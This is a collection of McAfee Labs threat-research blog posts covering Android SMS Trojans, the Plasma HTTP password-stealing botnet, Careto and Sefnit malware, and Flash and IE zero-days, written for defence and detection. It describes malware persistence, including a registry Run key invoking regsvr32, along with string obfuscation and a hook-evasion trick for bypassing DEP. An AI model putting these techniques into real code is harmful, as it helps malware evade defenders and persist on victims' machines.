Figure.2: The dialog to trick users into downloading and installing a fake RealPlayer.

After installation, the user is prompted to accept the first app’s update because the downloaded app also has the same package name as the one that initiated the download.

Figure.3: The confirmation dialog to update the original app with the downloaded one.

The downloaded app also requests excessive permissions, including SMS-related ones. It requests users to activate it as a DeviceAdmin app. It tries to persuade users by saying “Your boss told you to do this,” although that doesn’t really sound very persuasive. Finally it removes its app icon from home screen to make it invisible to the user.

Figure 4: The confirmation dialog to activate the fake app as a DeviceAdmin.

The downloaded app, which still claims to be RealPlayer, does not allow users to view adult movies in HD. Instead it registers several broadcast receivers triggered by the completion of the device’s boot sequence, adds or removes packages and SMS receipts, and invokes background services that communicates with its control server via HTTP, as seen in typical SMS Trojans on Android.

The app contains the following features:

• Sends SMS messages to a phone number with a text message, both specified in the command from the server.
• Updates the app by downloading the new app package, based on the device’s IMEI and the app package version.
• Discards SMS message received from a predefined set of phone numbers.
• Disables and enables these activities, based on server requests.

The app does nothing special as a DeviceAdmin for now because the current implementation is empty. So it just makes users take extra steps to disable it when uninstalling. However, the Trojan could be updated to a more malicious version at the server’s request.

Installing this malware and others distributed from outside Google Play can be easily blocked if users disable the “installation of apps from unknown sources” option in the device settings. Users need to be very careful about installing apps, especially when they request more permissions than their expected features warrant.

We should be wary of social engineering techniques to drop malware, even the process is initiated by apps on Google Play.

McAfee Mobile Security detects these malicious apps as Android/PhimSms.A and Android/PhimSmsDropper.A.

The post Vietnamese ‘Adult’ Apps on Google Play Open Gate to SMS Trojans appeared first on McAfee.

Last year we reported on the Athena HTTP botnet, which targets Windows XP systems, mostly for distributed denial-of-service attacks. Now we have examined the botnet Plasma HTTP, whose infections seem to be widespread and target all Windows systems. Attacker use this HTTP-based botnet primarily as a CPU and GPU cryptocurrency miner. Once a machine is infected, the bot can easily steal sensitive information such as usernames and passwords stored locally for the Google Chrome browser and FileZilla FTP client. We have seen a number of malicious websites hosting this botnet, most with a high infection rate. The following screenshot shows a panel with more than a thousand unique infections:

The bot sends system information such as operating system, CPU/GPU data, and security software installed to its control. The bot can stop or disable several security software apps. Here is an example of the information logged:

This information helps attackers run their malicious miners based on the GPU and CPU. Attackers can send a number of commands:

The bot can also passwords from infected machines. It then logs all the entries on its control server. A sample statistics page:

The bot has stolen more than 4,000 URLs and passwords stored in Chrome or FileZilla as we write this post. The password log page:

The Plasma HTTP bot supports five categories of malicious commands:

DDoS

• Slowloris
• UDP
• Arme
• HTTP Post
• HTTP Get
• Condis
• BwFlood
• Stop DDos

Miner

• CPU
• GPU

Bot

• Download
• Update
• Uninstall
• Update Gate

Botkiller

• Run Bot Killer Module
• Run Hard Bot Killer Module
• Enable Proactive Bot Killer
• Disable Proactive Bot Killer

Misc

• Hosts
• Shell
• Visit Hidden
• Visit Visible
• Torrent Seeder

 A look at network communication between bot and control server:

The request and response is simply a reversed Base64 string of the data sent and received. The decoded data:

Once the bot sends information, its control server sends multiple commands separated by “*” to its bot, which then downloads CPU and GPU miner files and runs them silently. The bot next steals stored passwords from Google Chrome and sends all the password logs to its controller. The bot sends information to its server:

The PHP files found in the bot panel are encoded using the ionCube loader–to prevent researchers quickly understanding the code. Here is a look at the encoded gate.php (which logs stolen data):

Once decoded, we can see the actual code:

Even though not sophisticated, the Plasma HTTP botnet offers several features. We have seen that attackers are using this bot especially for CPU and GPU mining, due to its ability to remain silent and undetected. The bot can kill other malicious programs such as remote-access tools or miners. The bot can also edit the hosts file, run shell commands, and display web pages. Plasma HTTP has infected the latest versions of Windows (using special social engineering techniques to gain the required privileges). The password logs we have seen show how dangerous this botnet can be and that your sensitive information is at risk.

The post Plasma HTTP Botnet Steals Passwords From Chrome, FileZilla appeared first on McAfee.

On February 4, Adobe released an out-of-band update for Adobe Flash Player. The update addresses a critical remote code execution vulnerability that is being actively exploited in the wild. The update applies to Windows, Mac OS X, and Linux.

We are currently analyzing details and indicators. Watch this space for updates, indicators, and more information about this threat.

Current McAfee product coverage and mitigation:

• McAfee Vulnerability Manager: The FSL/MVM package of February 5 includes a vulnerability check to assess if your systems are at risk.
• McAfee Application Control: Run-Time Control locks down systems and provides protection in the form of Execution Control and Memory Protection.
• McAfee Network Security Manager: The Network Security Emergency User Defined Signature (UDS) release of February 6 provides detection for this threat.

References:

• Adobe: http://helpx.adobe.com/security/products/flash-player/apsb14-04.html
• OSVDB: http://osvdb.org/show/osvdb/102849
• NVD: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0497
• McAfee: http://www.mcafee.com/us/content-release-notes/

The post Product Coverage and Mitigation for CVE-2014-0497 (Adobe Flash Player) appeared first on McAfee.

On February 4, Adobe released an out-of-band security update addressing a critical remote code execution vulnerability that is currently being exploited in the wild, according to the vendor’s blog post.

Our research team quickly responded to this threat, and we have already provided various protections through our products. (For details, check here.) We have learned that this vulnerability lies in the ActionScript Virtual Machine (AVM) implementations. Attackers can easily develop highly reliable exploits based on this vulnerability, so we strongly suggest that users immediately update their Flash Players.

Because the fault sits in the AVM, the weakness usually should affect almost every Flash Player version. However, according to our tests, we found that some old Flash Player versions are not affected by this vulnerability. We tested a number of recent releases (source). Here are the results:

This AVM-based vulnerability was introduced in the update of November 12, Version 11.9.900.152 or 11.7.700.252 (for Windows). Calculating the “lifetime” of this vulnerability, we see it survived for 84 days (or 12 weeks) until February 4.

Understanding the precious affected versions not only helps us understand the vulnerability more deeply, but also provides us a trustworthy way to evaluate the risk that the in-the-wild exploit poses. This case also highlights that product/security updates can not only fix vulnerabilities, but also can introduce new vulnerabilities, especially when new features are introduced.

Users of older Flash Players (specifically, those older than Versions 11.9.900.152 or 11.7.700.252) should still perform security updates. They may be lucky to not be affected by this particular threat, but all versions of Flash are at risk for other exploits.

Stay secure.

Thanks to my colleagues Jun Xie, Bing Sun, Chong Xu, and Xiaoning Li (Intel Labs) for their help with this analysis.

The post Flash Zero-Day Vulnerability CVE-2014-0497 Lasts 84 Days appeared first on McAfee.

Threats seem to be top of mind for the masses of late—with three large-scale attacks on major brands already this year, potentially compromising the financial data and identity of millions. And things don’t show signs of slowing down. Each year, security threats become more sophisticated and difficult to identify, with 2014 expected to be the same. Cybercriminals are constantly looking for new avenues of penetration into enterprise systems and consumer data, while security professionals across the board are wondering where the next attack will come from and how they’ll combat the growing variety of potential breaches aimed at their network and endpoint defenses.

With this in mind, McAfee Labs researchers recently released the McAfee Labs 2014 Threats Predictions report, detailing what we see as the biggest security concerns for the next 12 months.

Mobile malware, ransomware, social attacks, and big data topped our list. However, while compiling the report, we decided that we probably weren’t the only security professionals with predictions. So on January 30, we hosted a Twitter chat with Adam Wosotowsky, McAfee Labs Anti-Spam Operations Technology Principal, and Ryan Sherstobitoff, McAfee Labs Threat Researcher, to spark conversation around the topic.

For about an hour, security professionals and other interested individuals gathered on Twitter to talk shop around a variety of security issues—from big data to high-profile breaches. Below are some highlights from the chat.

What are your security predictions?

We started off by opening the floor to anyone who wanted to share their own ideas on 2014 threats. We saw two common threads emerge. First, a number of security professionals cited specific types of attacks they predicted to be on the rise in 2014.

Meanwhile, another conversation was arising around “psychological threats.” The topic that got the most attention was @securelexicon’s thoughts on what he referred to as apathy.

Next, the group delved into specific types of attacks mentioned by participants and in the report.

Target, Neiman Marcus: What’s next?

2014 started off with a bang for the information security community, with the high-profile breaches of Target, Neiman Marcus, and Michaels Stores. We asked our participants if this was a sign of bigger attacks to come.

Most participants saw the number of high-profile breaches as an indicator that companies weren’t doing enough to maximize their customers’ security. @VirtualTal said that companies were simply concerned with compliance, and not actually securing their data. @aamirlakhani and @SCADAhacker agreed that companies should invest in “detection and response and not just prevention.”

It wasn’t all negative however, as @RickChrisos was quick to suggest that perhaps these headline-grabbing breaches will open the eyes of big organizations, resulting in increased security for the future.

Advanced Malware, Big Data, and IoT

Three of the biggest trends discussed during our #SecChat related to emerging technologies, and how the security industry will have to respond to these developments.

First, we asked the group about their biggest challenge regarding advanced malware. Many participants, such as @Wh1t3Rabbit and @jtyrus, thought the biggest issue is that it continues to be difficult to detect. The consensus was that the security community will need to go further in looking for vulnerabilities and providing penetration tests. @GetZeroFOX had a theory on why we continue to see the amount of advanced malware grow.  

The conversation on advanced malware transitioned to a discussion on big data. Some participants, such as @TomGarcia_IS, saw big data and cloud applications as overall threats to company security. Others, such as @aamirlakhani, see big data as an opportunity.

Finally, we discussed one of 2014’s hottest topics to date – “the Internet of Things.” While IoT can be an exciting trend for consumers, most security professionals view it as a concern, as there are still more than a few security vulnerabilities present in new “smart” devices.

Overall, last week’s #SecChat was quite the interesting snapshot of where threats are expected to be headed in 2014. To stay up-to-date on the latest in security news and issues, be sure to follow #SecChat host @McAfeeBusiness on Twitter. Also, feel free to check out the entire #SecChat transcript here and read our predictions here.

The post January 2014 #SecChat Wrap-up — Threat Predictions appeared first on McAfee.

On Monday Kaspersky Labs announced the discovery of a large number of malware infections across large parts of the globe. Kaspersky has named this attack Careto, after what appears to be an internal name used by the attackers for one of the malware families involved. (The word careto in Spanish means ugly face or mask and is derived from an ancient religious ritual in Portugal.)

These infections involve components whose capabilities include:

• Stealth rootkit to hide its files and network traffic
• Sophisticated information-gathering tools to enumerate hardware and software configurations
• User account information stealing
• PGP key theft
• Uploading of user files
• Downloading of new and updated malware

The samples that we at McAfee Labs have seen suggest that this attack has been going on since 2007. If that is the case, the attackers have been very successful in both deploying and maintaining their malware unnoticed. The ramifications of this attack are likely to be serious and may come to light only after much more research and analysis.

While analyzing this malware, we very quickly realized that this would be no easy task. Starting with two simple installers we rapidly ended up with 39 files to analyze and reverse-engineer. To further complicate matters, several parts of the malware were resistant to standard analysis techniques and required in depth reverse engineering. As we slowly peeled away the layers, we found a highly sophisticated attack requiring a lot of analysis. The number of components involved and the use of on-demand encoding and decoding of strings by a modified RC4 algorithm gave us insight into Careto’s complexity. In this post we offer a preview. For a more detailed description of various modules, please refer to our upcoming McAfee Labs Threat Advisory. (We will add a link after the Advisory is published.)

The malware involved in this attack seems to be divided roughly into two separate groups: Careto and SGH. Both of these families are extremely modular in their design, allowing for very simple maintenance and upgrading because only small components are required rather than a single large file. The attackers clearly had a long-term view when they were developing this malware.

Custom Encryption

One of the first things we found when we started digging into the samples was the extensive use of encryption to obfuscate both incriminating strings and data objects that the malware used in its attack. These objects included both a payload file for dropping and configuration data blocks.

The encryption code looked familiar and in many ways resembled RC4; however, detailed analysis revealed that they were using a modified algorithm. The strings in every sample were encrypted using a custom RC4 algorithm along with an entropy-equalizer function to prevent automated systems from detecting anomalies.

Each encrypted character appears to be added with 0×80 like so:

Before being passed to the custom RC4 function, each character is decoded using the following function:

Basically, information stored in one encrypted byte is split across two bytes, thereby doubling the size of each encrypted string. Once a character has been decoded, it is passed to the custom RC4 function, which is similar to the original RC4 design with the following changes:

• S-Box size has increased from 256 elements to 260 elements
• The counter runs from 255 to 0 instead of 0 to 255 in RC4’s KSA loop
• Inside the KSA loop, if a value to be swapped is greater than the current counter value, a new value to be swapped is found

The first character of the RC4 decryption result is ignored, while the rest comprises the decrypted string.

Once we could decrypt the encoded strings, we thought we would have the malware cracked; but then we found that the attackers had another trick up their sleeves. Once decrypted, one of the encrypted strings appeared to be yet another encryption key. Sure enough, by examining the code we saw that this key was used to decrypt a further block of data–this time using what looked like standard RC4 encryption. This step finally enabled us to decrypt the payload of the droppers and unravel the malware in all its complexity.

Data Theft

Our analysis revealed data and information theft on a large scale. The initial malware samples exhibited some fairly basic information-gathering capabilities–such as user account name, system name, basic network configuration, etc. However, the malware’s modular design makes it easy to download additional malware modules to plug into the architecture. These data-gathering capabilities exceed pretty much everything else we have seen to date. The malware can gather around 100 data points in the following categories:

• Operating system
• Local user accounts
• Hardware
• Memory
• File system
• USB devices
• Running processes
• Installed software
• Network information
• Software
• Hardware
• Network
• Snapshot
• Private credentials

Victims of this attack include government institutions and embassies, gas and oil companies, scientific research organizations, and political activists. This is an attack of immense scale.

Our analysis of this malware is ongoing. We will publish further information as it comes to light. The full technical details of our analysis can be found in the upcoming McAfee Labs Threat Advisory.

We thank our colleagues Volodymyr Pikhur, Suriya Natarajan  and Mark Olea for their analysis.

The post Careto Worldwide Malware Attack Unmasked appeared first on McAfee.

Most malware is created for economic purposes. To name just a few of our reports and blogs on this topic, we have written about Cybercrime Exposed, stolen data, and the Target point-of-sale malware.

But sometimes it’s not clear to our customers how much time and skill malware authors invest in their tools. A recent case at McAfee Labs got us scratching our heads to understand what was going on. The malware in question was already detected by our products as Sefnit-FAT, but the true content of the malware couldn’t be replicated in our environment no matter what we did.

Sefnit is a malicious family used in ad-click fraud. The infected computers will start to silently access various advertisement links to increase the ad hits and give money to the ad owner.

This is usually done by installing a malicious DLL in the system that monitors active browsing sessions and injects code into any request made by the user. It may also involve the use of malicious browser add-ons, which perform the same function.

Back to our case: We had to describe the features in the malware sample submitted by one of our customers, but the sample wouldn’t replicate in our environment.

The sample was a DLL, packed with Themida, a known packer and code protector that is pretty hard to reverse-engineer. Accompanying the sample was a file with same name as the DLL but the extension .idx. It contained encrypted data.

After removing the Themida packer layer, we found the code to read and decrypt the .idx file. The DLL file was simply decrypting the content of .idx and loading it in memory.

But one thing caught our attention and explained why we were not able to replicate the sample: The “key” to decrypt the file was formed by hashing information from the machine on which it ran. The malware collected information such as machine GUID, the folder where it was started, computer name, and other data to generate a hash, which was then used as the key.

If the sample was not run from a specific folder, on a specific machine, it would not decrypt the payload.

How was that encrypted file generated? How did the malware author know what information was present on the target machine to create a file that was unique to it?

Connecting the Dots

We knew that this detection was pretty prevalent, with thousands of detections per day, and that got us thinking how the malware could be so widespread and at same time unique to each machine, which is a characteristic of a targeted attack.

Sefnit detection data. (Source: McAfee GTI)

Looking at our Global Threat Intelligence (GTI) data, we noticed that Sefnit-FAT overlapped samples detected by another detection: Trojan-FDNK.

Our GTI data allow us to relate samples based on several factors, and one that helped us is replication data. We were able to find an executable (MD5: 129FFF31E13180F6E42C1991FB20EA12) that during replication dropped another sample detected by Trojan-FDNK. That was possibly a dropper for the DLL we were trying to analyze.

The file was a small executable (less than 50KB) with a PDF icon. These files are usually dropped on user systems by exploit kits such as Blackhole, Redkit, or Cool. We detect these as Dropper-FJS, Sefnit-FDNJ, and Trojan-FDLW, among others.

This executable turned out to be another layer of obfuscation. Once executed, it looks for setup.dat in the same folder where it is located, and decrypts this content in memory, generating a DLL. Let’s call this the Dropper DLL.

This DLL is never written to disk, but instead is loaded in memory and executes from its entry point. When analyzing what this DLL did, we noticed that it was Sefnit.

Sefnit at Work

So we were able to find a dropper for the Sefnit DLL, but it was not clear yet how it was locked to run only on one specific machine. We took a closer look at the Dropper DLL, and what we found was pretty interesting.

Once the DLL executes, it collects the following information:

• Machine GUID
• System Driver: Name
• Process: Name, Executable Path
• Network Adapter Configuration: Caption, Description, MAC Address
• Computer System Product
• Operating System
• Processor
• Onboard Device
• CDROM Drive
• Sound Device
• Logical Disk
• Disk Drive
• Physical Media
• Computer System
• Base Board
• System Enclosure
• Display Configuration
• Video Controller
• BIOS
• System
• System Board: Product, OEM string array, Model, Caption, Serial number, Version, Manufacturer

The first hint that this had something to do with our DLL was the collection of the machine GUID, which was used by the Loader DLL to decrypt its payload. Analyzing the function that captured this information in both the Dropper DLL Sefnit sample and the Loader DLL we got from our customer, we confirmed that they have exactly the same code:

The code to collect machine GUID matches exactly on Dropper DLL and Loader DLL.

This information is encrypted and sent to the malicious control server for this malware. The server then sends another DLL, which is specifically tailored for the infected machine. And that DLL is exactly what we had from our customer.

This custom DLL was configured to look for a file in the same folder where it was dropped and with the same name as itself, but using one of four extensions: .idx, .lck, .txt, or .dat.

It decrypts this file using the same information collected by Dropper DLL, and starts this decrypted content the same way that the Dropper DLL was started.

We now had almost the full picture, but one piece was still missing: What was the content of the .idx file we received?

Exposing the Plot

Continuing our analysis of Dropper DLL, we noticed that after receiving Loader DLL from the web server, it creates a registry key to start it after reboot:

• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = regsvr32 /s %appdata%\loader.dll

(The preceding DLL name is just an example. The actual DLL might have random names on different systems.)

At this point, we solved the mystery: Dropper DLL, which was created in memory by the executable, encrypted itself using the same information collected earlier, and wrote the encrypted data to a file named after the Loader DLL sent from server, and using one of the four extensions we named.

We analyzed the rest of the code and found how the machine lock observed in the initial DLL is generated. The following graphic illustrates the process:

Flowchart of a Sefnit infection.

As we can see, the mysterious .idx is the same thing as the Dropper DLL generated in memory by the executable, which in turn was dropped on the system by the exploit kit.

We have found several other files with same name (setup.dat) on our database, and all of them can be decrypted by the same executable, and generate the same malware.

Conclusion

The group behind this malware uses a complex method to ensure that their samples will run only on specific machines, in an attempt to divert malware analysts and automated malware analyzer systems from learning what the malware does, and to avoid exposing code to anyone trying to see what is happening.

This may seem like too much work just to hide ad-click fraud, but if you have read our other reports you will know that these miscreants earn millions of dollars each year.

But with the power of our GTI infrastructure and a little ingenuity, we were able to uncover this malicious scheme and protect our customers.

The post Examining Your Very Own Sefnit Trojan appeared first on McAfee.

On February 19, Microsoft released Security Advisory (2934088) for Microsoft Internet Explorer. This vulnerability was previously reported, by 3rd parties, during the 2nd week of February 2014. In-the-wild exploitation has been observed (at least) back to early January 2014.

Specifically, the flaw is a use-after-free condition during Internet Explorer’s processing of specific CMarkup objects.

We are currently analyzing details and indicators. Watch this space for updates, indicators, and more information about this threat.

Current McAfee product coverage and mitigation:

• McAfee Vulnerability Manager: The FSL/MVM package of February 13 includes a vulnerability check to assess if your systems are at risk.
• McAfee Application Control: Run-Time Control locks down systems and provides protection in the form of Execution Control and Memory Protection.
• McAfee VirusScan: Coverage for known, associated, malware is provided in the 7350 DATs (February 15) as “Exploit-SWF” and the 7354 DATs (February 19) as “Exploit-CVE2014-0322″ and “Backdoor-FBSR”.
• McAfee Web Gateway: Coverage for known, associated, malware is provided in the 7350 DATs (February 15) as “Exploit-SWF” and the 7354 DATs (February 19) as “Exploit-CVE2014-0322″ and “Backdoor-FBSR”.
• McAfee GTI / Web / URL Reputation-enabled Controls: McAfee products with GTI enabled will block/identify malicious IP/Domain/URL traffic associated with this threat.

References:

• Microsoft Advisory: http://technet.microsoft.com/en-us/security/advisory/2934088
• Microsoft Fixit / KB: https://support.microsoft.com/kb/2934088 
• OSVDB: http://osvdb.org/103354
• NVD: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0322&cid=2
• US-CERT: http://www.kb.cert.org/vuls/id/732479

The post Product Coverage and Mitigation for CVE-2014-0322 (Microsoft Internet Explorer) appeared first on McAfee.

While analyzing a recent Internet Explorer zero-day vulnerability, CVE-2014-0322 (containing the Flash sample hash b9c9dab0fd30418884800afebbaba4d99f4526ef0c9a47972a20ab20fed0a06d), we noticed the exploit makes an unorthodox call to ZwProtectVirtualMemory to bypass data execution prevention.

What is different about this call? The argument(s) of ZwProtectVirtualMemory are placed in an unusual manner. Typically arguments that are pointer variables belonging to the stack must be greater than the extended stack pointer (ESP, in the already allocated region of the stack). After setting the stack pivot, the exploit makes the call to ZwProtectVirtualMemory as shown in this screen:

NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory (_In_ HANDLE   ProcessHandle,

_In_ PVOID *      BaseAddress,

_In_ SIZE_T *      NumberOfBytesToProtect,

_In_ ULONG       NewAccessProtection,

_Out_ PULONG   OldAccessProtection

)

The third parameter is a pointer variable on the stack, but this one lies in a yet to be allocated region of the stack. Typically the pointer should be greater than ESP, but in this case it is smaller.

Kernel calls don’t use the stack much; they are just a wrapper around the kernel, which has a different stack altogether. In the absence of a hook at ZwProtectVirtualMemory (for hook-based detection systems), this call will work smoothly like a normal call; but in the case of any hooks, this parameter has a tendency to get corrupted by allocated local variables of hooks and result in the failure of the API call, which will most likely result in the failure of the exploit–an unusual evasion by failure in the presence of a hook-based detection system.

We have also seen similar exploitation scenarios in the CVE-2013-3918 zero-day attack.

The post Internet Explorer Zero Day Offers Unusual Case Study appeared first on McAfee.